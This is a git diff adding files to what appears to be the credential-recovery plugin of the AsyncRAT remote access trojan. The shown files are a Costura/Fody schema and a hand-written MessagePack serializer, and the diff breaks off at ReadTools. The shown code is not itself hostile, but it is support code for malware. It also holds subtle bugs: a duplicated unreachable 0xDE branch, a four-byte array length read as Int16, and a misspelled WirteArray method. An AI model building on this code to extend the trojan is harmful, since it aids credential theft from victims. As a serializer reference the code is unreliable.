\ No newline at end of file
diff --git a/AsyncRAT-C#/Plugin/Recovery/Recovery/FodyWeavers.xsd b/AsyncRAT-C#/Plugin/Recovery/Recovery/FodyWeavers.xsd
new file mode 100644
index 0000000..44a5374
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/Recovery/Recovery/FodyWeavers.xsd
@@ -0,0 +1,111 @@
+
+
+
+
+
+
+
+
+
+
+
+ A list of assembly names to exclude from the default action of "embed all Copy Local references", delimited with line breaks
+
+
+
+
+ A list of assembly names to include from the default action of "embed all Copy Local references", delimited with line breaks.
+
+
+
+
+ A list of unmanaged 32 bit assembly names to include, delimited with line breaks.
+
+
+
+
+ A list of unmanaged 64 bit assembly names to include, delimited with line breaks.
+
+
+
+
+ The order of preloaded assemblies, delimited with line breaks.
+
+
+
+
+
+ This will copy embedded files to disk before loading them into memory. This is helpful for some scenarios that expected an assembly to be loaded from a physical file.
+
+
+
+
+ Controls if .pdbs for reference assemblies are also embedded.
+
+
+
+
+ Embedded assemblies are compressed by default, and uncompressed when they are loaded. You can turn compression off with this option.
+
+
+
+
+ As part of Costura, embedded assemblies are no longer included as part of the build. This cleanup can be turned off.
+
+
+
+
+ Costura by default will load as part of the module initialization. This flag disables that behavior. Make sure you call CosturaUtility.Initialize() somewhere in your code.
+
+
+
+
+ Costura will by default use assemblies with a name like 'resources.dll' as a satellite resource and prepend the output path. This flag disables that behavior.
+
+
+
+
+ A list of assembly names to exclude from the default action of "embed all Copy Local references", delimited with |
+
+
+
+
+ A list of assembly names to include from the default action of "embed all Copy Local references", delimited with |.
+
+
+
+
+ A list of unmanaged 32 bit assembly names to include, delimited with |.
+
+
+
+
+ A list of unmanaged 64 bit assembly names to include, delimited with |.
+
+
+
+
+ The order of preloaded assemblies, delimited with |.
+
+
+
+
+
+
+
+ 'true' to run assembly verification (PEVerify) on the target assembly after all weavers have been executed.
+
+
+
+
+ A comma-separated list of error codes that can be safely ignored in assembly verification.
+
+
+
+
+ 'false' to turn off automatic generation of the XML Schema file.
+
+
+
+
+
\ No newline at end of file
diff --git a/AsyncRAT-C#/Plugin/Recovery/Recovery/MessagePack/BytesTools.cs b/AsyncRAT-C#/Plugin/Recovery/Recovery/MessagePack/BytesTools.cs
new file mode 100644
index 0000000..bd66e46
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/Recovery/Recovery/MessagePack/BytesTools.cs
@@ -0,0 +1,102 @@
+using System;
+using System.Collections.Generic;
+using System.Linq;
+using System.Text;
+using System.Threading.Tasks;
+
+namespace Plugin.MessagePack
+{
+ public class BytesTools
+ {
+ static UTF8Encoding utf8Encode = new UTF8Encoding();
+
+ public static byte[] GetUtf8Bytes(String s)
+ {
+
+ return utf8Encode.GetBytes(s);
+ }
+
+ public static String GetString(byte[] utf8Bytes)
+ {
+ return utf8Encode.GetString(utf8Bytes);
+ }
+
+ public static String BytesAsString(byte[] bytes)
+ {
+ StringBuilder sb = new StringBuilder();
+ foreach (byte b in bytes)
+ {
+ sb.Append(String.Format("{0:D3} ", b));
+ }
+ return sb.ToString();
+ }
+
+
+ public static String BytesAsHexString(byte[] bytes)
+ {
+ StringBuilder sb = new StringBuilder();
+ foreach (byte b in bytes)
+ {
+ sb.Append(String.Format("{0:X2} ", b));
+ }
+ return sb.ToString();
+ }
+
+ ///
+ /// 交换byte数组数据
+ /// 可用于高低数据交换
+ ///
+ /// 要交换的byte数组
+ /// 返回交换后的数据
+ public static byte[] SwapBytes(byte[] v)
+ {
+ byte[] r = new byte[v.Length];
+ int j = v.Length - 1;
+ for (int i = 0; i < r.Length; i++)
+ {
+ r[i] = v[j];
+ j--;
+ }
+ return r;
+ }
+
+ public static byte[] SwapInt64(Int64 v)
+ {
+ //byte[] r = new byte[8];
+ //r[7] = (byte)v;
+ //r[6] = (byte)(v >> 8);
+ //r[5] = (byte)(v >> 16);
+ //r[4] = (byte)(v >> 24);
+ //r[3] = (byte)(v >> 32);
+ //r[2] = (byte)(v >> 40);
+ //r[1] = (byte)(v >> 48);
+ //r[0] = (byte)(v >> 56);
+ return SwapBytes(BitConverter.GetBytes(v));
+ }
+
+ public static byte[] SwapInt32(Int32 v)
+ {
+ byte[] r = new byte[4];
+ r[3] = (byte)v;
+ r[2] = (byte)(v >> 8);
+ r[1] = (byte)(v >> 16);
+ r[0] = (byte)(v >> 24);
+ return r;
+ }
+
+
+ public static byte[] SwapInt16(Int16 v)
+ {
+ byte[] r = new byte[2];
+ r[1] = (byte)v;
+ r[0] = (byte)(v >> 8);
+ return r;
+ }
+
+ public static byte[] SwapDouble(Double v)
+ {
+ return SwapBytes(BitConverter.GetBytes(v));
+ }
+
+ }
+}
\ No newline at end of file
diff --git a/AsyncRAT-C#/Plugin/Recovery/Recovery/MessagePack/MsgPack.cs b/AsyncRAT-C#/Plugin/Recovery/Recovery/MessagePack/MsgPack.cs
new file mode 100644
index 0000000..131eb37
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/Recovery/Recovery/MessagePack/MsgPack.cs
@@ -0,0 +1,926 @@
+using System;
+using System.Collections;
+using System.Collections.Generic;
+using System.IO;
+using System.Linq;
+using System.Text;
+using System.Threading.Tasks;
+
+
+namespace Plugin.MessagePack
+{
+ public class MsgPackEnum : IEnumerator
+ {
+ List children;
+ int position = -1;
+
+ public MsgPackEnum(List obj)
+ {
+ children = obj;
+ }
+ object IEnumerator.Current
+ {
+ get { return children[position]; }
+ }
+
+ bool IEnumerator.MoveNext()
+ {
+ position++;
+ return (position < children.Count);
+ }
+
+ void IEnumerator.Reset()
+ {
+ position = -1;
+ }
+
+ }
+
+ public class MsgPackArray
+ {
+ List children;
+ MsgPack owner;
+
+ public MsgPackArray(MsgPack msgpackObj, List listObj)
+ {
+ owner = msgpackObj;
+ children = listObj;
+ }
+
+ public MsgPack Add()
+ {
+ return owner.AddArrayChild();
+ }
+
+ public MsgPack Add(String value)
+ {
+ MsgPack obj = owner.AddArrayChild();
+ obj.AsString = value;
+ return obj;
+ }
+
+ public MsgPack Add(Int64 value)
+ {
+ MsgPack obj = owner.AddArrayChild();
+ obj.SetAsInteger(value);
+ return obj;
+ }
+
+ public MsgPack Add(Double value)
+ {
+ MsgPack obj = owner.AddArrayChild();
+ obj.SetAsFloat(value);
+ return obj;
+ }
+
+ public MsgPack this[int index]
+ {
+ get { return children[index]; }
+ }
+
+ public int Length
+ {
+ get { return children.Count; }
+ }
+ }
+
+ public class MsgPack : IEnumerable
+ {
+ string name;
+ string lowerName;
+ object innerValue;
+ MsgPackType valueType;
+ MsgPack parent;
+ List children = new List();
+ MsgPackArray refAsArray = null;
+
+ private void SetName(string value)
+ {
+ this.name = value;
+ this.lowerName = name.ToLower();
+ }
+
+ private void Clear()
+ {
+ for (int i = 0; i < children.Count; i++)
+ {
+ ((MsgPack)children[i]).Clear();
+ }
+ children.Clear();
+ }
+
+ private MsgPack InnerAdd()
+ {
+ MsgPack r = new MsgPack();
+ r.parent = this;
+ this.children.Add(r);
+ return r;
+ }
+
+ private int IndexOf(string name)
+ {
+ int i = -1;
+ int r = -1;
+
+ string tmp = name.ToLower();
+ foreach (MsgPack item in children)
+ {
+ i++;
+ if (tmp.Equals(item.lowerName))
+ {
+ r = i;
+ break;
+ }
+ }
+ return r;
+ }
+
+ public MsgPack FindObject(string name)
+ {
+ int i = IndexOf(name);
+ if (i == -1)
+ {
+ return null;
+ }
+ else
+ {
+ return this.children[i];
+ }
+ }
+
+
+ private MsgPack InnerAddMapChild()
+ {
+ if (valueType != MsgPackType.Map)
+ {
+ Clear();
+ this.valueType = MsgPackType.Map;
+ }
+ return InnerAdd();
+ }
+
+ private MsgPack InnerAddArrayChild()
+ {
+ if (valueType != MsgPackType.Array)
+ {
+ Clear();
+ this.valueType = MsgPackType.Array;
+ }
+ return InnerAdd();
+ }
+
+ public MsgPack AddArrayChild()
+ {
+ return InnerAddArrayChild();
+ }
+
+ private void WriteMap(Stream ms)
+ {
+ byte b;
+ byte[] lenBytes;
+ int len = children.Count;
+ if (len <= 15)
+ {
+ b = (byte)(0x80 + (byte)len);
+ ms.WriteByte(b);
+ }
+ else if (len <= 65535)
+ {
+ b = 0xDE;
+ ms.WriteByte(b);
+
+ lenBytes = BytesTools.SwapBytes(BitConverter.GetBytes((Int16)len));
+ ms.Write(lenBytes, 0, lenBytes.Length);
+ }
+ else
+ {
+ b = 0xDF;
+ ms.WriteByte(b);
+ lenBytes = BytesTools.SwapBytes(BitConverter.GetBytes((Int32)len));
+ ms.Write(lenBytes, 0, lenBytes.Length);
+ }
+
+ for (int i = 0; i < len; i++)
+ {
+ WriteTools.WriteString(ms, children[i].name);
+ children[i].Encode2Stream(ms);
+ }
+ }
+
+ private void WirteArray(Stream ms)
+ {
+ byte b;
+ byte[] lenBytes;
+ int len = children.Count;
+ if (len <= 15)
+ {
+ b = (byte)(0x90 + (byte)len);
+ ms.WriteByte(b);
+ }
+ else if (len <= 65535)
+ {
+ b = 0xDC;
+ ms.WriteByte(b);
+
+ lenBytes = BytesTools.SwapBytes(BitConverter.GetBytes((Int16)len));
+ ms.Write(lenBytes, 0, lenBytes.Length);
+ }
+ else
+ {
+ b = 0xDD;
+ ms.WriteByte(b);
+ lenBytes = BytesTools.SwapBytes(BitConverter.GetBytes((Int32)len));
+ ms.Write(lenBytes, 0, lenBytes.Length);
+ }
+
+
+ for (int i = 0; i < len; i++)
+ {
+ ((MsgPack)children[i]).Encode2Stream(ms);
+ }
+ }
+
+ public void SetAsInteger(Int64 value)
+ {
+ this.innerValue = value;
+ this.valueType = MsgPackType.Integer;
+ }
+
+ public void SetAsUInt64(UInt64 value)
+ {
+ this.innerValue = value;
+ this.valueType = MsgPackType.UInt64;
+ }
+
+ public UInt64 GetAsUInt64()
+ {
+ switch (this.valueType)
+ {
+ case MsgPackType.Integer:
+ return Convert.ToUInt64((Int64)this.innerValue);
+ case MsgPackType.UInt64:
+ return (UInt64)this.innerValue;
+ case MsgPackType.String:
+ return UInt64.Parse(this.innerValue.ToString().Trim());
+ case MsgPackType.Float:
+ return Convert.ToUInt64((Double)this.innerValue);
+ case MsgPackType.Single:
+ return Convert.ToUInt64((Single)this.innerValue);
+ case MsgPackType.DateTime:
+ return Convert.ToUInt64((DateTime)this.innerValue);
+ default:
+ return 0;
+ }
+
+ }
+
+ public Int64 GetAsInteger()
+ {
+ switch (this.valueType)
+ {
+ case MsgPackType.Integer:
+ return (Int64)this.innerValue;
+ case MsgPackType.UInt64:
+ return Convert.ToInt64((Int64)this.innerValue);
+ case MsgPackType.String:
+ return Int64.Parse(this.innerValue.ToString().Trim());
+ case MsgPackType.Float:
+ return Convert.ToInt64((Double)this.innerValue);
+ case MsgPackType.Single:
+ return Convert.ToInt64((Single)this.innerValue);
+ case MsgPackType.DateTime:
+ return Convert.ToInt64((DateTime)this.innerValue);
+ default:
+ return 0;
+ }
+ }
+
+ public Double GetAsFloat()
+ {
+ switch (this.valueType)
+ {
+ case MsgPackType.Integer:
+ return Convert.ToDouble((Int64)this.innerValue);
+ case MsgPackType.String:
+ return Double.Parse((String)this.innerValue);
+ case MsgPackType.Float:
+ return (Double)this.innerValue;
+ case MsgPackType.Single:
+ return (Single)this.innerValue;
+ case MsgPackType.DateTime:
+ return Convert.ToInt64((DateTime)this.innerValue);
+ default:
+ return 0;
+ }
+ }
+
+
+ public void SetAsBytes(byte[] value)
+ {
+ this.innerValue = value;
+ this.valueType = MsgPackType.Binary;
+ }
+
+ public byte[] GetAsBytes()
+ {
+ switch (this.valueType)
+ {
+ case MsgPackType.Integer:
+ return BitConverter.GetBytes((Int64)this.innerValue);
+ case MsgPackType.String:
+ return BytesTools.GetUtf8Bytes(this.innerValue.ToString());
+ case MsgPackType.Float:
+ return BitConverter.GetBytes((Double)this.innerValue);
+ case MsgPackType.Single:
+ return BitConverter.GetBytes((Single)this.innerValue);
+ case MsgPackType.DateTime:
+ long dateval = ((DateTime)this.innerValue).ToBinary();
+ return BitConverter.GetBytes(dateval);
+ case MsgPackType.Binary:
+ return (byte[])this.innerValue;
+ default:
+ return new byte[] { };
+ }
+ }
+
+ public void Add(string key, String value)
+ {
+ MsgPack tmp = InnerAddArrayChild();
+ tmp.name = key;
+ tmp.SetAsString(value);
+ }
+
+ public void Add(string key, int value)
+ {
+ MsgPack tmp = InnerAddArrayChild();
+ tmp.name = key;
+ tmp.SetAsInteger(value);
+ }
+
+ public bool LoadFileAsBytes(string fileName)
+ {
+ if (File.Exists(fileName))
+ {
+ byte[] value = null;
+ FileStream fs = new FileStream(fileName, FileMode.Open, FileAccess.Read, FileShare.Read);
+ value = new byte[fs.Length];
+ fs.Read(value, 0, (int)fs.Length);
+ fs.Close();
+ fs.Dispose();
+ SetAsBytes(value);
+ return true;
+ }
+ else
+ {
+ return false;
+ }
+
+ }
+
+ public bool SaveBytesToFile(string fileName)
+ {
+ if (this.innerValue != null)
+ {
+ FileStream fs = new FileStream(fileName, FileMode.Append);
+ fs.Write(((byte[])this.innerValue), 0, ((byte[])this.innerValue).Length);
+ fs.Close();
+ fs.Dispose();
+ return true;
+ }
+ else
+ {
+ return false;
+ }
+ }
+
+ public MsgPack ForcePathObject(string path)
+ {
+ MsgPack tmpParent, tmpObject;
+ tmpParent = this;
+ string[] pathList = path.Trim().Split(new Char[] { '.', '/', '\\' });
+ string tmp = null;
+ if (pathList.Length == 0)
+ {
+ return null;
+ }
+ else if (pathList.Length > 1)
+ {
+ for (int i = 0; i < pathList.Length - 1; i++)
+ {
+ tmp = pathList[i];
+ tmpObject = tmpParent.FindObject(tmp);
+ if (tmpObject == null)
+ {
+ tmpParent = tmpParent.InnerAddMapChild();
+ tmpParent.SetName(tmp);
+ }
+ else
+ {
+ tmpParent = tmpObject;
+ }
+ }
+ }
+ tmp = pathList[pathList.Length - 1];
+ int j = tmpParent.IndexOf(tmp);
+ if (j > -1)
+ {
+ return tmpParent.children[j];
+ }
+ else
+ {
+ tmpParent = tmpParent.InnerAddMapChild();
+ tmpParent.SetName(tmp);
+ return tmpParent;
+ }
+ }
+
+ public void SetAsNull()
+ {
+ Clear();
+ this.innerValue = null;
+ this.valueType = MsgPackType.Null;
+ }
+
+ public void SetAsString(String value)
+ {
+ this.innerValue = value;
+ this.valueType = MsgPackType.String;
+ }
+
+ public String GetAsString()
+ {
+ if (this.innerValue == null)
+ {
+ return "";
+ }
+ else
+ {
+ return this.innerValue.ToString();
+ }
+
+ }
+
+ public void SetAsBoolean(Boolean bVal)
+ {
+ this.valueType = MsgPackType.Boolean;
+ this.innerValue = bVal;
+ }
+
+ public void SetAsSingle(Single fVal)
+ {
+ this.valueType = MsgPackType.Single;
+ this.innerValue = fVal;
+ }
+
+ public void SetAsFloat(Double fVal)
+ {
+ this.valueType = MsgPackType.Float;
+ this.innerValue = fVal;
+ }
+
+
+
+ public void DecodeFromBytes(byte[] bytes)
+ {
+ using (MemoryStream ms = new MemoryStream())
+ {
+ ms.Write(bytes, 0, bytes.Length);
+ ms.Position = 0;
+ DecodeFromStream(ms);
+ }
+ }
+
+ public void DecodeFromFile(string fileName)
+ {
+ FileStream fs = new FileStream(fileName, FileMode.Open);
+ DecodeFromStream(fs);
+ fs.Dispose();
+ }
+
+
+
+ public void DecodeFromStream(Stream ms)
+ {
+ byte lvByte = (byte)ms.ReadByte();
+ byte[] rawByte = null;
+ MsgPack msgPack = null;
+ int len = 0;
+ int i = 0;
+
+ if (lvByte <= 0x7F)
+ { //positive fixint 0xxxxxxx 0x00 - 0x7f
+ SetAsInteger(lvByte);
+ }
+ else if ((lvByte >= 0x80) && (lvByte <= 0x8F))
+ {
+ //fixmap 1000xxxx 0x80 - 0x8f
+ this.Clear();
+ this.valueType = MsgPackType.Map;
+ len = lvByte - 0x80;
+ for (i = 0; i < len; i++)
+ {
+ msgPack = InnerAdd();
+ msgPack.SetName(ReadTools.ReadString(ms));
+ msgPack.DecodeFromStream(ms);
+ }
+ }
+ else if ((lvByte >= 0x90) && (lvByte <= 0x9F)) //fixarray 1001xxxx 0x90 - 0x9f
+ {
+ //fixmap 1000xxxx 0x80 - 0x8f
+ this.Clear();
+ this.valueType = MsgPackType.Array;
+ len = lvByte - 0x90;
+ for (i = 0; i < len; i++)
+ {
+ msgPack = InnerAdd();
+ msgPack.DecodeFromStream(ms);
+ }
+ }
+ else if ((lvByte >= 0xA0) && (lvByte <= 0xBF)) // fixstr 101xxxxx 0xa0 - 0xbf
+ {
+ len = lvByte - 0xA0;
+ SetAsString(ReadTools.ReadString(ms, len));
+ }
+ else if ((lvByte >= 0xE0) && (lvByte <= 0xFF))
+ { /// -1..-32
+ // negative fixnum stores 5-bit negative integer
+ // +--------+
+ // |111YYYYY|
+ // +--------+
+ SetAsInteger((sbyte)lvByte);
+ }
+ else if (lvByte == 0xC0)
+ {
+ SetAsNull();
+ }
+ else if (lvByte == 0xC1)
+ {
+ throw new Exception("(never used) type $c1");
+ }
+ else if (lvByte == 0xC2)
+ {
+ SetAsBoolean(false);
+ }
+ else if (lvByte == 0xC3)
+ {
+ SetAsBoolean(true);
+ }
+ else if (lvByte == 0xC4)
+ { // max 255
+ len = ms.ReadByte();
+ rawByte = new byte[len];
+ ms.Read(rawByte, 0, len);
+ SetAsBytes(rawByte);
+ }
+ else if (lvByte == 0xC5)
+ { // max 65535
+ rawByte = new byte[2];
+ ms.Read(rawByte, 0, 2);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ len = BitConverter.ToUInt16(rawByte, 0);
+
+ // read binary
+ rawByte = new byte[len];
+ ms.Read(rawByte, 0, len);
+ SetAsBytes(rawByte);
+ }
+ else if (lvByte == 0xC6)
+ { // binary max: 2^32-1
+ rawByte = new byte[4];
+ ms.Read(rawByte, 0, 4);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ len = BitConverter.ToInt32(rawByte, 0);
+
+ // read binary
+ rawByte = new byte[len];
+ ms.Read(rawByte, 0, len);
+ SetAsBytes(rawByte);
+ }
+ else if ((lvByte == 0xC7) || (lvByte == 0xC8) || (lvByte == 0xC9))
+ {
+ throw new Exception("(ext8,ext16,ex32) type $c7,$c8,$c9");
+ }
+ else if (lvByte == 0xCA)
+ { // float 32
+ rawByte = new byte[4];
+ ms.Read(rawByte, 0, 4);
+ rawByte = BytesTools.SwapBytes(rawByte);
+
+ SetAsSingle(BitConverter.ToSingle(rawByte, 0));
+ }
+ else if (lvByte == 0xCB)
+ { // float 64
+ rawByte = new byte[8];
+ ms.Read(rawByte, 0, 8);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ SetAsFloat(BitConverter.ToDouble(rawByte, 0));
+ }
+ else if (lvByte == 0xCC)
+ { // uint8
+ // uint 8 stores a 8-bit unsigned integer
+ // +--------+--------+
+ // | 0xcc |ZZZZZZZZ|
+ // +--------+--------+
+ lvByte = (byte)ms.ReadByte();
+ SetAsInteger(lvByte);
+ }
+ else if (lvByte == 0xCD)
+ { // uint16
+ // uint 16 stores a 16-bit big-endian unsigned integer
+ // +--------+--------+--------+
+ // | 0xcd |ZZZZZZZZ|ZZZZZZZZ|
+ // +--------+--------+--------+
+ rawByte = new byte[2];
+ ms.Read(rawByte, 0, 2);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ SetAsInteger(BitConverter.ToUInt16(rawByte, 0));
+ }
+ else if (lvByte == 0xCE)
+ {
+ // uint 32 stores a 32-bit big-endian unsigned integer
+ // +--------+--------+--------+--------+--------+
+ // | 0xce |ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ
+ // +--------+--------+--------+--------+--------+
+ rawByte = new byte[4];
+ ms.Read(rawByte, 0, 4);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ SetAsInteger(BitConverter.ToUInt32(rawByte, 0));
+ }
+ else if (lvByte == 0xCF)
+ {
+ // uint 64 stores a 64-bit big-endian unsigned integer
+ // +--------+--------+--------+--------+--------+--------+--------+--------+--------+
+ // | 0xcf |ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|
+ // +--------+--------+--------+--------+--------+--------+--------+--------+--------+
+ rawByte = new byte[8];
+ ms.Read(rawByte, 0, 8);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ SetAsUInt64(BitConverter.ToUInt64(rawByte, 0));
+ }
+ else if (lvByte == 0xDC)
+ {
+ // +--------+--------+--------+~~~~~~~~~~~~~~~~~+
+ // | 0xdc |YYYYYYYY|YYYYYYYY| N objects |
+ // +--------+--------+--------+~~~~~~~~~~~~~~~~~+
+ rawByte = new byte[2];
+ ms.Read(rawByte, 0, 2);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ len = BitConverter.ToInt16(rawByte, 0);
+
+ this.Clear();
+ this.valueType = MsgPackType.Array;
+ for (i = 0; i < len; i++)
+ {
+ msgPack = InnerAdd();
+ msgPack.DecodeFromStream(ms);
+ }
+ }
+ else if (lvByte == 0xDD)
+ {
+ // +--------+--------+--------+--------+--------+~~~~~~~~~~~~~~~~~+
+ // | 0xdd |ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ| N objects |
+ // +--------+--------+--------+--------+--------+~~~~~~~~~~~~~~~~~+
+ rawByte = new byte[4];
+ ms.Read(rawByte, 0, 4);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ len = BitConverter.ToInt16(rawByte, 0);
+
+ this.Clear();
+ this.valueType = MsgPackType.Array;
+ for (i = 0; i < len; i++)
+ {
+ msgPack = InnerAdd();
+ msgPack.DecodeFromStream(ms);
+ }
+ }
+ else if (lvByte == 0xD9)
+ {
+ // str 8 stores a byte array whose length is upto (2^8)-1 bytes:
+ // +--------+--------+========+
+ // | 0xd9 |YYYYYYYY| data |
+ // +--------+--------+========+
+ SetAsString(ReadTools.ReadString(lvByte, ms));
+ }
+ else if (lvByte == 0xDE)
+ {
+ // +--------+--------+--------+~~~~~~~~~~~~~~~~~+
+ // | 0xde |YYYYYYYY|YYYYYYYY| N*2 objects |
+ // +--------+--------+--------+~~~~~~~~~~~~~~~~~+
+ rawByte = new byte[2];
+ ms.Read(rawByte, 0, 2);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ len = BitConverter.ToInt16(rawByte, 0);
+
+ this.Clear();
+ this.valueType = MsgPackType.Map;
+ for (i = 0; i < len; i++)
+ {
+ msgPack = InnerAdd();
+ msgPack.SetName(ReadTools.ReadString(ms));
+ msgPack.DecodeFromStream(ms);
+ }
+ }
+ else if (lvByte == 0xDE)
+ {
+ // +--------+--------+--------+~~~~~~~~~~~~~~~~~+
+ // | 0xde |YYYYYYYY|YYYYYYYY| N*2 objects |
+ // +--------+--------+--------+~~~~~~~~~~~~~~~~~+
+ rawByte = new byte[2];
+ ms.Read(rawByte, 0, 2);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ len = BitConverter.ToInt16(rawByte, 0);
+
+ this.Clear();
+ this.valueType = MsgPackType.Map;
+ for (i = 0; i < len; i++)
+ {
+ msgPack = InnerAdd();
+ msgPack.SetName(ReadTools.ReadString(ms));
+ msgPack.DecodeFromStream(ms);
+ }
+ }
+ else if (lvByte == 0xDF)
+ {
+ // +--------+--------+--------+--------+--------+~~~~~~~~~~~~~~~~~+
+ // | 0xdf |ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ| N*2 objects |
+ // +--------+--------+--------+--------+--------+~~~~~~~~~~~~~~~~~+
+ rawByte = new byte[4];
+ ms.Read(rawByte, 0, 4);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ len = BitConverter.ToInt32(rawByte, 0);
+
+ this.Clear();
+ this.valueType = MsgPackType.Map;
+ for (i = 0; i < len; i++)
+ {
+ msgPack = InnerAdd();
+ msgPack.SetName(ReadTools.ReadString(ms));
+ msgPack.DecodeFromStream(ms);
+ }
+ }
+ else if (lvByte == 0xDA)
+ {
+ // str 16 stores a byte array whose length is upto (2^16)-1 bytes:
+ // +--------+--------+--------+========+
+ // | 0xda |ZZZZZZZZ|ZZZZZZZZ| data |
+ // +--------+--------+--------+========+
+ SetAsString(ReadTools.ReadString(lvByte, ms));
+ }
+ else if (lvByte == 0xDB)
+ {
+ // str 32 stores a byte array whose length is upto (2^32)-1 bytes:
+ // +--------+--------+--------+--------+--------+========+
+ // | 0xdb |AAAAAAAA|AAAAAAAA|AAAAAAAA|AAAAAAAA| data |
+ // +--------+--------+--------+--------+--------+========+
+ SetAsString(ReadTools.ReadString(lvByte, ms));
+ }
+ else if (lvByte == 0xD0)
+ {
+ // int 8 stores a 8-bit signed integer
+ // +--------+--------+
+ // | 0xd0 |ZZZZZZZZ|
+ // +--------+--------+
+ SetAsInteger((sbyte)ms.ReadByte());
+ }
+ else if (lvByte == 0xD1)
+ {
+ // int 16 stores a 16-bit big-endian signed integer
+ // +--------+--------+--------+
+ // | 0xd1 |ZZZZZZZZ|ZZZZZZZZ|
+ // +--------+--------+--------+
+ rawByte = new byte[2];
+ ms.Read(rawByte, 0, 2);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ SetAsInteger(BitConverter.ToInt16(rawByte, 0));
+ }
+ else if (lvByte == 0xD2)
+ {
+ // int 32 stores a 32-bit big-endian signed integer
+ // +--------+--------+--------+--------+--------+
+ // | 0xd2 |ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|
+ // +--------+--------+--------+--------+--------+
+ rawByte = new byte[4];
+ ms.Read(rawByte, 0, 4);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ SetAsInteger(BitConverter.ToInt32(rawByte, 0));
+ }
+ else if (lvByte == 0xD3)
+ {
+ // int 64 stores a 64-bit big-endian signed integer
+ // +--------+--------+--------+--------+--------+--------+--------+--------+--------+
+ // | 0xd3 |ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|
+ // +--------+--------+--------+--------+--------+--------+--------+--------+--------+
+ rawByte = new byte[8];
+ ms.Read(rawByte, 0, 8);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ SetAsInteger(BitConverter.ToInt64(rawByte, 0));
+ }
+ }
+
+ public byte[] Encode2Bytes()
+ {
+ using (MemoryStream ms = new MemoryStream())
+ {
+ Encode2Stream(ms);
+ byte[] r = new byte[ms.Length];
+ ms.Position = 0;
+ ms.Read(r, 0, (int)ms.Length);
+ return r;
+ }
+ }
+
+ public void Encode2Stream(Stream ms)
+ {
+ switch (this.valueType)
+ {
+ case MsgPackType.Unknown:
+ case MsgPackType.Null:
+ WriteTools.WriteNull(ms);
+ break;
+ case MsgPackType.String:
+ WriteTools.WriteString(ms, (String)this.innerValue);
+ break;
+ case MsgPackType.Integer:
+ WriteTools.WriteInteger(ms, (Int64)this.innerValue);
+ break;
+ case MsgPackType.UInt64:
+ WriteTools.WriteUInt64(ms, (UInt64)this.innerValue);
+ break;
+ case MsgPackType.Boolean:
+ WriteTools.WriteBoolean(ms, (Boolean)this.innerValue);
+ break;
+ case MsgPackType.Float:
+ WriteTools.WriteFloat(ms, (Double)this.innerValue);
+ break;
+ case MsgPackType.Single:
+ WriteTools.WriteFloat(ms, (Single)this.innerValue);
+ break;
+ case MsgPackType.DateTime:
+ WriteTools.WriteInteger(ms, GetAsInteger());
+ break;
+ case MsgPackType.Binary:
+ WriteTools.WriteBinary(ms, (byte[])this.innerValue);
+ break;
+ case MsgPackType.Map:
+ WriteMap(ms);
+ break;
+ case MsgPackType.Array:
+ WirteArray(ms);
+ break;
+ default:
+ WriteTools.WriteNull(ms);
+ break;
+ }
+ }
+
+ public String AsString
+ {
+ get
+ {
+ return GetAsString();
+ }
+ set
+ {
+ SetAsString(value);
+ }
+ }
+
+ public Int64 AsInteger
+ {
+ get { return GetAsInteger(); }
+ set { SetAsInteger((Int64)value); }
+ }
+
+ public Double AsFloat
+ {
+ get { return GetAsFloat(); }
+ set { SetAsFloat(value); }
+ }
+ public MsgPackArray AsArray
+ {
+ get
+ {
+ lock (this)
+ {
+ if (refAsArray == null)
+ {
+ refAsArray = new MsgPackArray(this, children);
+ }
+ }
+ return refAsArray;
+ }
+ }
+
+
+ public MsgPackType ValueType
+ {
+ get { return valueType; }
+ }
+
+
+ IEnumerator IEnumerable.GetEnumerator()
+ {
+ return new MsgPackEnum(children);
+ }
+ }
+}
\ No newline at end of file
diff --git a/AsyncRAT-C#/Plugin/Recovery/Recovery/MessagePack/MsgPackType.cs b/AsyncRAT-C#/Plugin/Recovery/Recovery/MessagePack/MsgPackType.cs
new file mode 100644
index 0000000..2567ae6
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/Recovery/Recovery/MessagePack/MsgPackType.cs
@@ -0,0 +1,24 @@
+using System;
+using System.Collections.Generic;
+using System.Linq;
+using System.Text;
+using System.Threading.Tasks;
+
+namespace Plugin.MessagePack
+{
+ public enum MsgPackType
+ {
+ Unknown = 0,
+ Null = 1,
+ Map = 2,
+ Array = 3,
+ String = 4,
+ Integer = 5,
+ UInt64 = 6,
+ Boolean = 7,
+ Float = 8,
+ Single = 9,
+ DateTime = 10,
+ Binary = 11
+ }
+}
\ No newline at end of file
diff --git a/AsyncRAT-C#/Plugin/Recovery/Recovery/MessagePack/ReadTools.cs b/AsyncRAT-C#/Plugin/Recovery/Recovery/MessagePack/ReadTools.cs
new file mode 100644
index 0000000..9e85968
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/Recovery/Recovery/MessagePack/ReadTools.cs
@@ -0,0 +1,84 @@
+using System;
+using System.Collections.Generic;
+using System.IO;
+using System.Linq;
+using System.Text;
+using System.Threading.Tasks;
+
+namespace Plugin.MessagePack
+{
+ class ReadTools
